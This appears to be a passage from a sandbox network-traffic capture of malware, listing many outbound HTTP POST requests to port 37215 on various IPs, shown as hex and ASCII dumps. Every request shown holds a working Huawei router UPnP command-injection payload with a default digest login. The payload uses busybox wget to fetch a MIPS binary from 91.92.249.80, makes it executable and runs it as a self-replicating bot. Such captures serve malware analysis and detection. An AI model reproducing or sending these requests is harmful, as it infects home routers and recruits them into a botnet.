                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2064192.168.2.2358988157.72.59.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.598937035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2065192.168.2.2359164157.153.108.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.599037886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2066192.168.2.2353888197.127.45.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.599050999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2067192.168.2.2337196128.252.254.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.599062920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2068192.168.2.233702241.132.10.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.599066973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2069192.168.2.2344644208.129.60.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.599083900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2070192.168.2.234206869.66.155.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.599222898 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2071192.168.2.2353036157.215.204.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.599618912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2072192.168.2.2345380197.64.234.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.607161999 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2073192.168.2.2357386197.216.103.22237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.607929945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 